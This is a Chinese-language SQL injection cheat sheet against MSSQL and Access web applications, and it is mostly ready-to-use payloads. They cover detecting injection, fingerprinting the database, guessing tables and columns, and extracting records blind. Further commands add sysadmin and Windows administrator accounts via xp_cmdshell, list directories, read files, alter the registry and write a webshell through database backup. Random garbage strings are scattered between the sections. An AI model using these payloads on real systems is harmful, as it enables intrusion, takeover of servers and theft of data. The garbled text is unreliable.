1.判断是否有注入：;and 1=1 （页面正常） ;and 1=2 （页面出错或内容变化）
2.初步判断是否是mssql：;and user>0 （mssql 中 user 为 nvarchar，与 int 比较会触发类型转换错误，报错信息里同时带出当前数据库用户名）
90#* el
3.注入参数是字符型时：'and [查询条件] and ''='  （末尾的 ''=' 用来闭合原语句的引号）
JR8|!Of@B
4.搜索框未过滤参数时：'and [查询条件] and '%25'='  （%25 是 URL 编码后的 %，用来闭合原语句中的 like '%...%'）
/k8I6
5.判断数据库系统
;and (select count(*) from sysobjects)>0   页面正常则为 mssql（sysobjects 在新版本中只是兼容视图，亦可用 sys.objects）
;and (select count(*) from msysobjects)>0   页面正常则为 access（access 默认可能不允许读取 MSysObjects 系统表，若报“没有读取权限”一类错误，同样说明是 access）
]VL} eHZ
Z_[ P7P
\3OEC`
6.猜表名 ;and (select Count(*) from [表名])>0  （原文写作“数据库名”，from 后面实际要填的是表名，下同）
URceq2_
7.猜字段 ;and (select Count(字段名) from 表名)>0
nNq<x^@83
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0  （逐步增大右侧数值，按页面真假确定长度；top 1 没有 order by 时取到哪一行不保证固定）
D&i\dgbK
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
（第二个参数是字符位置，从 1 起逐位用 > / < 二分比较即可还原整条记录）
D(l,Z
10.测试权限结构(mssql)
（IS_SRVROLEMEMBER / IS_MEMBER 返回 1 表示是该角色成员，0 表示不是，NULL 表示角色名无效或无法判断）
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
}[Z'Sg]s
{;DAKWm@T
gu3iaM$W
11.添加mssql和系统的帐户（需要 sysadmin 权限；xp_cmdshell 在 SQL Server 2005 及以后默认关闭，须由 sysadmin 先开启）
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
（sp_addlogin / sp_password 已被标记为弃用，新版本对应 CREATE LOGIN / ALTER LOGIN）
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
（原文把这一条拆成了两行，且 /workstations:* 与 /times:all 之间缺少空格，按上面一行整条提交）
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
n74\{`8]o
rw,Ylr:3
])wdd>'
12.(1)遍历目录（会在当前库中建表，需要 create table 权限，用完应 drop）
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0  （varchar 与 int 比较触发转换错误，目录名随报错信息带出）
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0
（原文此处写作 >) ，应为 >0；目录名长度超过 100 时 insert 可能被截断或报错）
c`soVqT$?
'|DW#l\n
-T,?'J0 2
(2)遍历目录（insert ... exec 要求目标列数与存储过程返回列数一致）
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列，与 temp 的 4 列对应）
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（返回 1 列）
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构（返回 目录名、深度 2 列）
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（每行输出一条记录）
q7X#LY k
@khFk.LBD
x"{aO6M
13.mssql中的存储过程（以下注册表过程均需 sysadmin 权限；对 HKEY_LOCAL_MACHINE 的写入/删除会直接影响主机配置，谨慎使用）
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'  以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'  返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型常用的有2种：REG_SZ 表示字符型，REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'  写入注册表
xp_regdeletevalue 根键,子键,值名
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'  删除某个值
xp_regdeletekey 根键,子键
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'  删除键,包括该键下所有值
|NuMDVd+s
~[HzGm%
CRK%^3g
14.mssql的backup创建webshell（需要对 model 库的 backup 权限，c:\ 须对 SQL Server 服务账户可写且能被 web 服务读取；写出的 .asp 文件除 str 内容外还夹带备份文件的二进制头尾）
use model
create table cmd(str image);
insert into cmd(str) values ('');  -- 原文此处引号内的 webshell 内容已丢失，需自行填入
backup database model to disk='c:\l.asp';
（注意：model 是新建数据库的模板库，在其中建的表会带入之后新建的每个库，用完应 drop table cmd）
(`1io
=SJ#6uFS
QQrldc(I
15.mssql内置函数
;and (select @@version)>0  报错带出 SQL Server 版本字符串（其中含操作系统版本信息，并不是单独的 Windows 版本号）
;and user_name()='dbo'  判断当前连接用户在当前库中是否映射为 dbo（以 sa 或该库所有者连接时为真，不能单凭此断定就是 sa）
;and (select user_name())>0  报错带出当前连接用户
;and (select db_name())>0  报错带出当前连接的数据库名
o-\h;aQJ
^%r6+ey
lq-KM8j
16.简洁的webshell（与第14节相同的 backup 写法）
use model
create table cmd(str image);
insert into cmd(str) values ('');  -- 引号内的 webshell 内容在此副本中同样缺失
Tn&